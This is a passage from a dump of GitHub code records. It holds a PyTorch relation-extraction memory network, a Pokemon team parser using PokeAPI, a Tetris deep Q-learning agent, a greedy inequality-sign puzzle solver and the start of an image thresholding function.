= query[0][labels[ix]]\n # score is the same, but normalize over different set!\n # scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n # scores = self.pred_sm(scores.view(1, -1))\n # else:\n # scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n # scores = self.pred_sm(scores.view(-1, self.n_rel)).view(bz, self.n_rel, self.n_rel).max(1)[0]\n #\n # else:\n # scores = self.pred_sm((query * self.r_embed).sum(dim=-1) + self.r_bias)\n ret.append(query)\n # ret.append(scores)\n ans = torch.stack(ret)\n return ans\n\nclass MEM_CNN_WIKI(MEM_CNN_RIEDEL):\n def __init__(self, settings):\n super(MEM_CNN_WIKI, self).__init__(settings)\n self.bilinear = nn.Parameter(torch.randn(self.query_dim, self.out_c), requires_grad=True)\n\n self.query_dim = 100\n memory_dim = self.query_dim\n if self.order_embed is not None:\n memory_dim += self.order_embed_size\n for i in range(self.hop_size):\n # also add bias ?\n C = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n C.weight.data.normal_(0, 0.1)\n self.add_module('C_{}'.format(i), C)\n self.C = AttrProxy(self, 'C_')\n\n self.use_rank = settings['use_rank']\n\n # relation embedding size is the same as MEM's output\n self.r_embed = nn.Parameter(torch.zeros(self.n_rel, self.query_dim))\n self.r_bias = nn.Parameter(torch.randn(self.n_rel), requires_grad=True)\n con = math.sqrt(6.0/(self.query_dim + self.n_rel))\n nn.init.uniform_(self.r_embed, a=-con, b=con)\n nn.init.uniform_(self.r_bias, a=-con, b=con)\n\n self.query_last = settings['query_last']\n\n self.bilinear = nn.Parameter(torch.randn(memory_dim, self.query_dim), requires_grad=True)\n\n self.M_embed = nn.Parameter(torch.rand(self.n_rel, memory_dim), requires_grad=True)\n\n def forward(self, inputs):\n # the return of cnn is 
stored as memories for later querying.\n bz = len(inputs)\n # pdb.set_trace()\n mem_bags = self._create_sentence_embedding(inputs)\n # first I try the queries with time.\n # queries = self._create_queries_2(kwargs['en_pairs'])\n if self.query_type == 'ENTITY':\n queries = self._create_queries_2(inputs)\n elif self.query_type == 'SELF':\n queries = self._create_queries_4(inputs, encoding_output=mem_bags)\n else:\n queries = self._create_queries_3(inputs)\n\n # queries = self._create_queries_2(inputs)\n labels = [item['label'] for item in inputs]\n pred = self._predict(mem_bags, queries, labels=labels, inputs=inputs)\n return pred\n\n # predict function for entity-advised queries\n def _predict_with_entity(self, mem_bags, queries, labels=None):\n ret = []\n # trained one by one\n # memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : 1 * query_dim\n query_r = queries[ix]\n if not self.query_last:\n query_r = torch.cat([query_r] * memory.size(0), dim=0)\n else:\n query_r = query_r.reshape(1, -1)\n\n # maybe we should consider limiting the bag size of inputs\n # (index tensors need no gradient)\n lookup_tensor = torch.LongTensor(\n list(range(memory.size(0)))[-self.bag_size:] + \\\n (memory.size(0) - self.bag_size) * [0])\n # order_embed : bag_size * order_embed_size\n order_embed = self.order_embed(lookup_tensor)\n order_embed *= self.order_weight\n # query : bag_size * 1 * (order_embed_size + query_size)\n # each indicates a query for answer of one relation\n query = torch.cat([query_r, order_embed], dim=-1)\n memory = torch.cat([memory, order_embed], dim=-1)\n # query_embed = self.C[0](query)\n\n # version is denoting key-val or layer-wise\n # version = 2\n for hop in range(self.max_hops):\n # maybe a key-val embedding, maybe layer embedding.\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n else:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n\n # softmax need 2D tensor\n # each query over all memories\n tmp = torch.matmul(query, m_key.t())\n # adding attention-bias\n prob = self.atten_sm(tmp)\n # prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n query = query + o_k\n # can subtract the query vector out to find which is our target.\n # query -= query_r\n if getattr(self, 'debug', False):  # 'debug' is never set in __init__\n self.debug = False\n query = self.dropout(query)\n scores = torch.matmul(query, self.bilinear)\n\n ret.append(self.pred_sm(scores))\n return ret\n\n # In this version, I use standard memN2N structure\n def _predict(self, mem_bags, queries, labels=None, inputs=None):\n ret = []\n # trained one by one\n # memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : n_rel * D\n query_r = queries[ix]\n if not self.query_last:\n # query_r = torch.cat([query_r] * memory.size(0), dim=0)\n query_r = torch.stack([query_r] * memory.size(0))\n else:\n query_r = query_r.unsqueeze(0)\n query = query_r\n\n # maybe we should consider limiting the bag size of inputs\n if self.use_rank:\n # padding at first\n lookup_tensor = torch.cuda.LongTensor(inputs[ix]['ranks'])\n lookup_tensor += self.bag_size - lookup_tensor[-1] - 1\n lookup_tensor = lookup_tensor.clamp(0, self.bag_size-1)\n else:\n lookup_tensor = torch.cuda.LongTensor(\n list(range(memory.size(0)))[:self.bag_size] + \\\n (memory.size(0) - self.bag_size) * [0])\n # lookup_tensor = torch.tensor(lookup_tensor, requires_grad=True)\n\n # order_embed : bag_size * order_embed_size\n if self.order_embed is not None:\n 
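# (editor sketch) The order/position embedding tags each memory slot with its\n # temporal rank: lookup_tensor holds one index per sentence (clamped to\n # bag_size), self.order_embed maps each index to an order_embed_size vector\n # (sinusoidal when the 'circular' setting is on, cf. position_encoding_init\n # above), and the result is scaled by order_weight and concatenated onto both\n # the memories and the queries below.\n 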
order_embed = self.order_weight * self.order_embed(lookup_tensor)\n memory = torch.cat([memory, order_embed], dim=-1)\n order_embed = order_embed.view(order_embed.size(0), 1, order_embed.size(-1))\n order_embed = torch.cat([order_embed] * self.n_rel, dim=1)\n # query : query_size (maybe bag_size) * n_rel * (order_embed_size + query_size)\n\n # handle the case when memory_size != query_size\n order_embed = order_embed[:query.size(0)]\n # each indicates a query for answer of one relation\n query = torch.cat([query_r, order_embed], dim=-1)\n\n attention_bias = torch.triu(torch.ones(query.size(0), query.size(0)), diagonal=1) * (-1e9)\n attention_bias = attention_bias.cuda()\n\n # version is denoting key-val or layer-wise\n # version = 2\n for hop in range(self.max_hops):\n # maybe a key-val embedding, maybe layer embedding.\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n else:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n\n # softmax need 2D tensor\n # each query over all memories\n tmp = torch.matmul(query, m_key.t())\n if self.tri_attention:\n # add the triangular attention bias\n tmp = tmp + attention_bias.unsqueeze(1)\n\n prob_size = tmp.size()\n prob = self.atten_sm(tmp.view(-1, m_key.size(0)))\n prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n try:\n query = query + o_k\n except:\n pdb.set_trace()\n # can subtract the query vector out to find which is our target.\n query = self.dropout(query)\n if self.order_embed is not None:\n query = torch.matmul(query, self.bilinear)\n\n # after changing with attention pcnn\n modified = False\n if modified:\n # query size is same as memory size\n if self.training:\n query = query[torch.arange(0, query.size(0)).cuda().long(), labels[ix].cuda()]\n # score is the same, but normalize over different set!\n\n scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n scores = self.pred_sm(scores.view(memory.size(0), -1))\n # pdb.set_trace()\n # scores = self.pred_sm(scores.view(1, -1))\n else:\n scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n scores = self.pred_sm(scores.view(-1, self.n_rel)).view(scores.size(0), self.n_rel, self.n_rel).max(1)[0].view(scores.size(0), -1)\n else:\n scores = (query * self.r_embed).sum(dim=-1) + self.r_bias\n scores = self.pred_sm(scores.view(query.size(0), -1))\n\n # scores already went through pred_sm above; don't apply log-softmax twice\n ret.append(scores)\n return ret","repo_name":"ElliottYan/DS_Temporal","sub_path":"mem_cnn.py","file_name":"mem_cnn.py","file_ext":"py","file_size_in_byte":24564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"536632703","text":"from pokemon import Pokemon\r\nimport re\r\nimport requests\r\n\r\nclass Player:\r\n \r\n def __init__(self, pokemonlist):\r\n\r\n # per-instance list (a class-level list would be shared across players)\r\n self.pokemonList = []\r\n self.pokemonNames = []\r\n self.playerPokemonStats = []\r\n pokemondata = []\r\n getdata = re.compile('.+?(?=\\s@|\\s\\()')\r\n \r\n playerdata = pokemonlist.split('\\n\\n')\r\n for i in range(len(playerdata)):\r\n tempPokeData = playerdata[i]\r\n pokemonName = getdata.findall(tempPokeData)[0]\r\n if pokemonName.endswith('-Mega'):\r\n pokemonName = pokemonName[:-5]\r\n self.pokemonNames.append(pokemonName)\r\n else:\r\n self.pokemonNames.append(pokemonName)\r\n print(pokemonName)\r\n \r\n print(self.pokemonNames)\r\n link = 'https://pokeapi.co/api/v2/pokemon/' + pokemonName.lower() + '/'\r\n print(link)\r\n pokemondata.append(requests.get(link))\r\n for i in 
range(len(playerdata)):\r\n self.pokemonList.append(pokemondata[i].json())\r\n\r\n\r\n counter = 0\r\n for basePokemonStats in self.pokemonList:\r\n #Creates a pokemon using base stats and pokemon data\r\n try:\r\n myPokemonStats = playerdata[self.pokemonList.index(basePokemonStats)]\r\n except IndexError:\r\n break\r\n \r\n #print(myPokemonStats)\r\n self.playerPokemonStats.append(Pokemon(myPokemonStats, basePokemonStats, self.pokemonNames[counter]))\r\n counter+= 1\r\n \r\n\r\n\r\n '''\r\n #Player 1 moves\r\n getmoves = re.compile('(?<=\\-\\s).+')\r\n move = []\r\n for i in range(len(playerdata)):\r\n tempPokeMoves = playerdata[i]\r\n move.append(getmoves.findall(tempPokeMoves))\r\n #add moves to class\r\n '''\r\n\r\n\r\n\r\n \r\n","repo_name":"dinocoder/Pokemon-battle-game","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24362263887","text":"\nimport TetrisAgent\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport random\nimport copy\nimport time\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom Piece import from_array\n\n# This file serves as a template for Tetris AI.\n\n\n\n\n\"\"\" Global Variables \"\"\"\n\nwidth = 10\nheight = 20\ndepth = 2\n\n\"\"\" End Global Variables \"\"\"\n\n\n\n\nclass Net(nn.Module):\n\n def __init__(self, num_convolutions, num_convolutions_bot, linear_sizes, ks, ks_bot, input_shape=(1, depth, height, width), output_shape = 5):\n super(Net, self).__init__()\n \n self.activation = F.relu\n self.input_shape = input_shape\n \n self.conv1 = nn.Conv3d(in_channels=num_convolutions[0],\n out_channels=num_convolutions[1],\n kernel_size=ks[0],\n padding=(0, 2, 2))\n #self.conv1.weight.data.normal_(0, 0.1)\n #self.conv1.bias.data.normal_(0, 0.1)\n \n self.conv2 = nn.Conv3d(in_channels=num_convolutions[1],\n out_channels=num_convolutions[2],\n kernel_size=ks[1],\n padding=(0, 1, 1))\n #self.conv2.weight.data.normal_(0, 0.1)\n #self.conv2.bias.data.normal_(0, 0.1)\n \n self.conv3 = nn.Conv3d(in_channels=num_convolutions[2],\n out_channels=num_convolutions[3],\n kernel_size=ks[2],\n padding=(0, 2, 2))\n #self.conv3.weight.data.normal_(0, 0.1)\n #self.conv3.bias.data.normal_(0, 0.1)\n \n \n # Bottom convolution\n \n self.convBot = nn.Conv3d(in_channels=num_convolutions_bot[0],\n out_channels=num_convolutions_bot[1],\n kernel_size=ks_bot[0],\n padding=(0, 1, 0))\n #self.convBot.weight.data.normal_(0, 0.1)\n #self.convBot.bias.data.normal_(0, 0.1)\n \n \n self.n_size = self._get_conv_output(input_shape)\n self.n_size_bot = self._get_bot_conv_output(input_shape)\n self.linear_sizes = linear_sizes\n self.linear_sizes.insert(0, self.n_size) #+self.n_size_bot)\n \n \n self.fc1 = nn.Linear(linear_sizes[0], linear_sizes[1])\n #self.fc1.weight.data.normal_(0, 0.02)\n #self.fc1.bias.data.normal_(0, 0.02)\n \n self.fc2 = nn.Linear(linear_sizes[1], linear_sizes[2])\n #self.fc2.weight.data.normal_(0, 0.02)\n #self.fc2.bias.data.normal_(0, 0.02)\n \n self.fc3 = nn.Linear(linear_sizes[2], output_shape)\n self.fc3.weight.data.normal_(0, 0.1)\n self.fc3.bias.data.normal_(0, 0.1)\n \n self.loss = nn.MSELoss()\n \n def _get_conv_output(self, shape):\n inp = Variable(torch.rand(1, 
*shape))\n output_feat = self._forward_features(inp)\n n_size = output_feat.data.view(1, -1).size(1)\n return n_size\n \n def _get_bot_conv_output(self, shape):\n inp_bot = Variable(torch.rand(1, *shape))\n output_feat_bot = self.convBot(inp_bot)\n return output_feat_bot.data.view(1, -1).size(1)\n \n def _forward_features(self, x):\n f = self.conv1\n x = self.activation(f(x))\n x = self.activation(self.conv2(x))\n #x = self.activation(self.conv3(x))\n return x\n \n def forward(self, x):\n self.conv1.double()\n self.conv2.double()\n #self.conv3.double()\n self.convBot.double()\n self.fc1.double()\n self.fc2.double()\n self.fc3.double()\n feat_top = self._forward_features(x)\n #feat_bot = self.activation(self.convBot(x))\n #x = torch.cat([feat_top.view(-1, self.n_size), feat_bot.view(-1, self.n_size_bot)], 1)\n x = feat_top.view(-1, self.n_size)\n x = self.activation(self.fc1(x))\n #x = F.dropout(x, training=self.training)\n x = self.activation(self.fc2(x))\n #x = F.dropout(x, training=self.training)\n x = self.fc3(x)\n return x\n \n def mse_loss(self, inp, target):\n return torch.sum((inp - target) ** 2) / inp.data.nelement()\n\nclass MyAgent(TetrisAgent.TetrisAgent):\n\n ########################\n # Constructor\n ########################\n def __init__(self, gridWidth, gridHeight, policy=None, optimizer=None, epsilon_min=0.03, epsilon_max = 1.0, epsilon_decay = 200, training=True, batch_size=80, QDepth=1, Gamma=0.99, replay_mem_len = 30000):\n TetrisAgent.TetrisAgent.__init__(self, gridWidth, gridHeight, policy)\n self.use_cuda = torch.cuda.is_available()\n self.Q = policy\n if (self.use_cuda):\n self.Q = torch.nn.DataParallel(self.Q).cuda()\n self.Q.train()\n self.cached_Q = copy.deepcopy(policy)\n self.optimizer = optimizer\n self.epsilon_min = epsilon_min\n self.epsilon_max = epsilon_max\n self.epsilon_decay = epsilon_decay\n self.step = 0\n self.training = training\n self.batch_size = batch_size\n \n self.all_histories = []\n self.replay_memory = []\n self.QDepth = QDepth\n self.Gamma = Gamma\n self.replay_mem_len = replay_mem_len\n \n self.original_history = []\n self.training_history = []\n self.testing_history = []\n \n self.errors = []\n \n self.num_frames = 0\n self.loss = nn.MSELoss()\n \n #############################\n # Define action_from_state\n #\n # The actions are as follows:\n # 0: Move the current piece left, if it is a valid move\n # 1: Move the current piece right, if it is a valid move\n # 2: Rotate the current piece clockwise\n # 3: Rotate the current piece counter-clockwise\n # 4: Drop the piece to the bottom\n # 5: no-op\n ############################# \n def action_from_state(self):\n current_state = self.state\n action = 0\n if (self.training): # epsilon search\n number = random.random()\n eps = self.epsilon_at_step()\n if (number < eps):\n action = random.randint(0, len(self.action_space()) - 1)\n else:\n outputs = self.evaluate(current_state)\n action = np.argmax(outputs.data.cpu().numpy()) # default action\n \n if (self.num_frames % 20 == 0):\n err = self.gradient_step()\n print(str(self.num_frames), err)\n self.errors.append(err)\n \n if (len(self.errors) % 20 == 0):\n self.plot_errors()\n \n # Update the target every 300 iterations\n if (len(self.errors) % 15 == 0):\n self.cached_Q = copy.deepcopy(self.Q)\n \n self.num_frames += 1\n \n else:\n outputs = self.evaluate(current_state)\n # move to CPU before converting, in case the model runs on the GPU\n action = np.argmax(outputs.data.cpu().numpy())\n return action\n \n def plot_errors(self):\n \n \n \n plt.figure(1)\n plt.clf()\n errors = np.array(self.errors)\n 
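# (editor note) Live training curve: action_from_state calls plot_errors once\n # every 20 recorded TD errors, and the plt.pause(0.001) below lets the same\n # figure redraw without blocking -- this assumes an interactive matplotlib\n # backend is available.\n 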
plt.title('Training . . .')\n plt.xlabel('Episode')\n plt.ylabel('Error')\n #plt.ylim(0, 100)\n plt.plot(errors)\n plt.pause(0.001)\n \n def generate_replay_memory(self):\n self.training = False\n for i in range(self.replay_mem_len):\n score = self.perform_iteration(rand=True, selective=True)\n print (str(i+1) + \"th replay memory game generated with score \", score)\n self.original_history = copy.deepcopy(self.all_histories)\n print(len(self.original_history))\n \n # Returns values of all actions from a single state\n def evaluate(self, state):\n s = stack(state)\n shape = s.shape\n s = s.reshape((1, 1, shape[0], shape[1], shape[2]))\n data = Variable(torch.from_numpy(s))\n data = data.type(torch.DoubleTensor)\n answer = self.Q(data)\n return answer\n \n def evaluate_cached(self, state):\n s = stack(state)\n shape = s.shape\n s = s.reshape((1, 1, shape[0], shape[1], shape[2]))\n data = Variable(torch.from_numpy(s))\n data = data.type(torch.DoubleTensor)\n answer = self.cached_Q(data)\n return answer\n \n # Returns values of all actions from a group of states\n def evaluate_many(self, in_states, policy):\n s = stack(in_states[0])\n shape = s.shape\n states = np.zeros((len(in_states), 1, shape[0], shape[1], shape[2]))\n states[0] = states[0]\n for i in range(1, len(states)):\n states[i] = stack(in_states[i])\n data = Variable(torch.from_numpy(states))\n data = data.type(torch.DoubleTensor)\n answer = policy(data)\n return answer\n \n # Compute epsilon exploration factor\n def epsilon_at_step(self):\n exp = (-1. * self.step / self.epsilon_decay)\n exp = math.e ** exp\n return self.epsilon_min + (self.epsilon_max - self.epsilon_min) * exp\n \n # Return torch.ByteTensor to condense output of evaluate_many to desired vector\n def action_mask(self, actions):\n actions = np.array(actions)\n mask = np.array([[1 if actions[j] == i else 0 for i in range(len(self.action_space()))] for j in range(len(actions))])\n mask = Variable(torch.from_numpy(mask)).type(torch.ByteTensor)\n return mask\n \n # Performs gradient descent, handles the training\n def gradient_step(self):\n data, actions, rewards, data_next = self.random_batch_samples()\n \n if (self.use_cuda):\n actions = self.action_mask(actions).cuda()\n else:\n actions = self.action_mask(actions)\n values = self.evaluate_many(data, self.Q)\n \n targets = self.Gamma * self.evaluate_many(data_next, self.cached_Q)\n targets = torch.max(targets, 1)[0]\n #print(targets.data.numpy())\n \n rewards = ((Variable(torch.from_numpy(np.array(rewards)), requires_grad=False)).type(torch.DoubleTensor))\n if (self.use_cuda):\n rewards = rewards.cuda()\n \n #print(values, targets, rewards)\n \n targets += rewards\n #targets += np.array(rewards)\n \n #targets = Variable(torch.from_numpy(targets))\n #targets = targets.type(torch.DoubleTensor)\n output = torch.masked_select(values, actions)\n t0 = time.time()\n self.optimizer.zero_grad()\n error = self.loss(output, Variable(targets.data, requires_grad=False))\n error.backward()\n self.optimizer.step()\n #print(output.data.numpy()[0], targets.data.numpy()[0])\n \n return error.data.cpu().numpy()[0]\n \n def train(self, num_iterations):\n print (\"Now training : \\n \\n \")\n self.training = True\n self.Q.train()\n for i in range(num_iterations):\n t0 = time.time()\n reward = self.perform_iteration()\n #print(\"full iteration time: \", time.time() - t0)\n if (self.step % 2 == 0):\n self.visualize([self.all_histories[-1]])\n print(\"Game \" + str(self.step) + \" had a score of \" + str(reward))\n self.step += 1\n \n 
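# (editor note) Bookkeeping sketch: all_histories is assumed to hold the\n # replay-seeding games first, then the games from this training run, so the\n # slice below carves out just the training portion. Note that\n # generate_replay_memory appends selectively (only games with score > 0), so\n # if any seeding game was skipped this offset is only approximate.\n 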
self.training_history = self.all_histories[self.replay_mem_len:( self.replay_mem_len + num_iterations)]\n \n def test(self, num_iterations):\n self.training = False\n self.Q.eval()\n for i in range(num_iterations):\n reward = self.perform_iteration()\n print(reward)\n \n # Seperate out test results\n lower = self.replay_mem_len + len(self.training_history)\n upper = len(self.all_histories)\n self.testing_history = self.all_histories[lower : upper]\n \n # Runs an entire game and records the data\n def perform_iteration(self, rand=False, selective=False):\n self.run(rand)\n final_score = self.TetrisGame.score\n if (selective):\n if (final_score > 0.0):\n self.all_histories.append(self.history)\n self.replay_memory.append(self.sars_data)\n else:\n self.all_histories.append(self.history)\n self.replay_memory.append(self.sars_data)\n self.reset()\n return final_score\n \n # returns self.batch_size samples from replay memory, stored as states, targets, and actions\n def random_batch_samples(self):\n output_data = []\n data_next = []\n output_targets = np.zeros((self.batch_size, 1), dtype=np.float)\n output_actions = []\n rewards = []\n for i in range(self.batch_size):\n episode = random.randint(0, len(self.replay_memory)-1)\n iteration = random.randint(0, len(self.replay_memory[episode])-1)\n output_data.append(self.replay_memory[episode][iteration][0])\n #target = self.compute_target(episode, iteration, self.QDepth)\n \n rewards.append(self.replay_memory[episode][iteration][2])\n data_next.append(self.replay_memory[episode][iteration][3])\n \n #output_targets[i] = target\n output_actions.append(self.replay_memory[episode][iteration][1])\n return output_data, output_actions, rewards, data_next\n \n # Evaluates the target value of states in the replay memory\n # QDepth determines how many steps forward the Q function is computed\n def compute_target(self, episode, iteration, QDepth):\n if (iteration >= len(self.replay_memory[episode])):\n return 0.0\n if (QDepth == 0):\n v = self.evaluate(self.replay_memory[episode][iteration][0])\n outputs = v.data.numpy()\n index = np.argmax(outputs)\n return outputs[0][index]\n return self.replay_memory[episode][iteration][2] + self.Gamma * self.compute_target(episode, iteration + 1, QDepth - 1)\n \n \n def visualize(self, history):\n for i in range(len(history)):\n self.TetrisGame.visualize(history[i])\n \n def convert_replay_mem(self):\n new_replay_mem = []\n for i in range(len(self.replay_memory)):\n new_game = []\n game = self.replay_memory[i]\n for j in range(len(game)):\n new_sars = []\n sars = game[j]\n new_sars.append(self.convert_state(sars[0]))\n new_sars.append(sars[1])\n new_sars.append(sars[2])\n new_sars.append(self.convert_state(sars[3]))\n \n new_game.append(np.array(new_sars))\n new_replay_mem.append(np.array(new_game))\n return np.array(new_replay_mem) \n \n def convert_state(self, state):\n new_state = []\n new_state.append(state[0])\n new_state.append(state[1].to_array())\n new_state.append(state[2].to_array())\n return np.array(new_state)\n \n def recover_replay_mem(self, data):\n replay_mem = []\n for i in range(len(data)):\n new_game = []\n game = data[i]\n for j in range(len(game)):\n new_sars = []\n sars = game[j]\n \n new_sars.append(self.recover_state(sars[0]))\n new_sars.append(sars[1])\n new_sars.append(sars[2])\n new_sars.append(self.recover_state(sars[3]))\n \n new_game.append(np.array(new_sars))\n replay_mem.append(np.array(new_game))\n return np.array(replay_mem)\n \n def recover_state(self, state):\n new_state = []\n 
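# (editor note) Inverse of convert_state above: a state is [grid ndarray,\n # current Piece, next Piece]; the grid passes through unchanged while the\n # two pieces are rebuilt from their array form via from_array (imported at\n # the top of this file).\n 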
new_state.append(state[0])\n new_state.append(from_array(state[1]))\n new_state.append(from_array(state[2]))\n return np.array(new_state)\n \n \n def write_replay_mem(self):\n #print(np.array(self.original_history))\n np.save(\"replay_mem.npy\", self.convert_replay_mem())\n #print(np.load(\"replay_mem.npy\"), \"loaded data\") \n \n def read_replay_mem(self):\n self.replay_memory = np.load(\"replay_mem.npy\")\n self.replay_memory = self.recover_replay_mem(self.replay_memory).tolist()\n print(len(self.replay_memory))\n self.replay_memory = n_copies(self.replay_memory, 10)\n print(len(self.replay_memory))\n #print(self.original_history)\n \ndef stack(s):\n '''\n s is structured as a list containing: [numpy_array_grid, Piece, Piece]\n return:\n depth by h by w numpy array. Top layer is grid, middle layer is current piece, bottom layer is next piece\n '''\n grid = s[0]\n p1 = s[1]\n p2 = s[2]\n shape = (depth, grid.shape[0], grid.shape[1])\n output = np.zeros(shape, dtype=np.float)\n \n # Top layer is the grid\n output[0,:,:] = grid\n \n \"\"\"\n Remove the following five lines if you want to restore the old data structuring.\n This section is for a 1 by h by w output, where the current piece is stored as\n negative 1's. The other option is to do depth x h x w where the piece is stored\n in a deeper layer.\n \"\"\"\n \n \"\"\"\n x = p1.topLeftXBlock-1\n y = p1.topLeftYBlock-1\n w = p1.width\n h = p1.height\n output[0,y:y+h,x:x+w] = -1 * p1.matrix\n \"\"\"\n \n # Middle layer is ones where the current piece is, zero elsewhere\n x = p1.topLeftXBlock-1\n y = p1.topLeftYBlock-1\n w = p1.width\n h = p1.height\n output[1,y:y+h,x:x+w] = p1.matrix\n \n \"\"\"\n # Bottom layer is ones where the next piece will start, zero elsewhere\n x = p2.topLeftXBlock-1\n y = p2.topLeftYBlock-1\n w = p2.width\n h = p2.height\n output[2,y:y+h,x:x+w] = p2.matrix\n \n \"\"\"\n \n return output\n \ndef generateModel():\n num_convolutions_top = [1, 40, 40, 40]\n num_convolutions_bot = [1, 30]\n linear_sizes = [4000, 10000]\n ks_top = [(depth, 5, 5), (1, 3, 3), (1, 2, 2)]\n ks_bot = [(depth, 4, width)]\n output = Net(num_convolutions_top, num_convolutions_bot, linear_sizes, ks_top, ks_bot)\n return output\n \ndef n_copies(list_to_copy, n):\n output = []\n for i in range(len(list_to_copy)):\n for j in range(n):\n # copy element i, n times\n output.append(copy.deepcopy(list_to_copy[i]))\n \n return output \n \ndef main():\n # Define your policy\n policy = generateModel()\n # MyAgent wraps the policy in DataParallel and moves it to the GPU itself\n print(policy)\n # Define your optimizer\n optimizer = optim.SGD(policy.parameters(), lr=5e-5, momentum=0.5)\n # Declare Agent - it is constructed assuming it is to be trained\n Agent = MyAgent(10, 20, policy, optimizer)\n #print (\"Generating replay memory . . .\")\n #Agent.generate_replay_memory()\n #Agent.write_replay_mem()\n Agent.read_replay_mem()\n \n \n print (\"Training . . .\")\n Agent.train(1000)\n print (\"Testing . . 
.\")\n Agent.test(50)\n # Visualize random games\n Agent.visualize(Agent.testing_history)\n \n \n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mcguiremichael/TetrisAI","sub_path":"McGuireAI.py","file_name":"McGuireAI.py","file_ext":"py","file_size_in_byte":19439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176856233","text":"import copy\r\n\r\ndef solution(k, A):\r\n answer = ''\r\n max_ = copy.deepcopy(A)\r\n for i in range(0, 2*len(max_)+1, 2):\r\n max_.insert(i, '')\r\n num = 9\r\n for i in range(len(max_)):\r\n if max_[i] == '>':\r\n for j in range(i-1, -1, -2):\r\n if max_[j] == '':\r\n max_[j] = str(num)\r\n num -= 1\r\n else:\r\n break\r\n for i in range(len(max_)-1, -1, -1):\r\n if max_[i] == '':\r\n max_[i] = str(num)\r\n num -= 1\r\n for i in range(0, len(max_), 2):\r\n answer += max_[i]\r\n return answer\r\n\r\ndef solution2(k, A):\r\n answer = ''\r\n min_ = copy.deepcopy(A)\r\n for i in range(0, 2*len(min_)+1, 2):\r\n min_.insert(i, '')\r\n num = len(min_)//2\r\n for i in range(len(min_)-1, -1, -1):\r\n if min_[i] == '<':\r\n for j in range(i+1, len(min_), 2):\r\n if min_[j] == '':\r\n min_[j] = str(num)\r\n num -= 1\r\n else:\r\n break\r\n idx = set()\r\n for i in range(0, len(min_), 2):\r\n if min_[i] == '':\r\n if i != len(min_)-1:\r\n if min_[i+1] == '>':\r\n idx.add(i)\r\n else:\r\n if idx:\r\n for index in list(set(idx)):\r\n min_[index] = str(num)\r\n num -= 1\r\n idx = set()\r\n if idx:\r\n for index in list(set(idx)):\r\n min_[index] = str(num)\r\n num -= 1\r\n for i in range(len(min_)-1, -1, -1):\r\n if min_[i] == '':\r\n min_[i] = str(num)\r\n num -= 1\r\n for i in range(0, len(min_), 2):\r\n answer += min_[i]\r\n return answer\r\n\r\nk = int(input())\r\nA = list(map(str, input().split()))\r\nprint(solution(k, A))\r\nprint(solution2(k, A))","repo_name":"khw5123/Algorithm","sub_path":"BOJ/그리디/부등호.py","file_name":"부등호.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16714360036","text":"#============================================================================================\n# Circularity Based Thresholding Function\n# Author: Gerald M\n#\n# This function returns the threshold at which the image has the highest mean circularity.\n#============================================================================================\n\nimport scipy.ndimage\nfrom scipy.optimize import curve_fit\nimport numpy as np\nimport math, csv\nfrom multiprocessing import Pool, cpu_count, Array, Manager\nfrom functools import partial\nfrom skimage.measure import regionprops, label\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef func(x, a, x0, sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n\ndef circularity(thresh, A, SIZE):\n A_thresh = (A>thresh).astype(int)\n A_thresh = scipy.ndimage.morphology.binary_fill_holes(A_thresh).astype(int)\n\n #Image.fromarray(A_thresh.astype(float)).save('/Users/gm515/Desktop/temp/circ/'+str(thresh)+'.tif')\n\n A_label = label(A_thresh, connectivity=A_thresh.ndim)\n\n # Find circularity\n circfunc = lambda r: (4 * math.pi * r.area) / (r.perimeter * r.perimeter)\n\n circ = [circfunc(region) for region in regionprops(A_label) if region.area>SIZE and region.area0]\n\n if len(circ)>0:\n return np.mean(np.array(circ))\n else:\n return 0.\n\ndef circthresh(A,SIZE,THRESHLIM):\n thresh_int = 2\n thresh_all = np.arange(np.min(A),np.max(A),thresh_int)\n\n # Get 
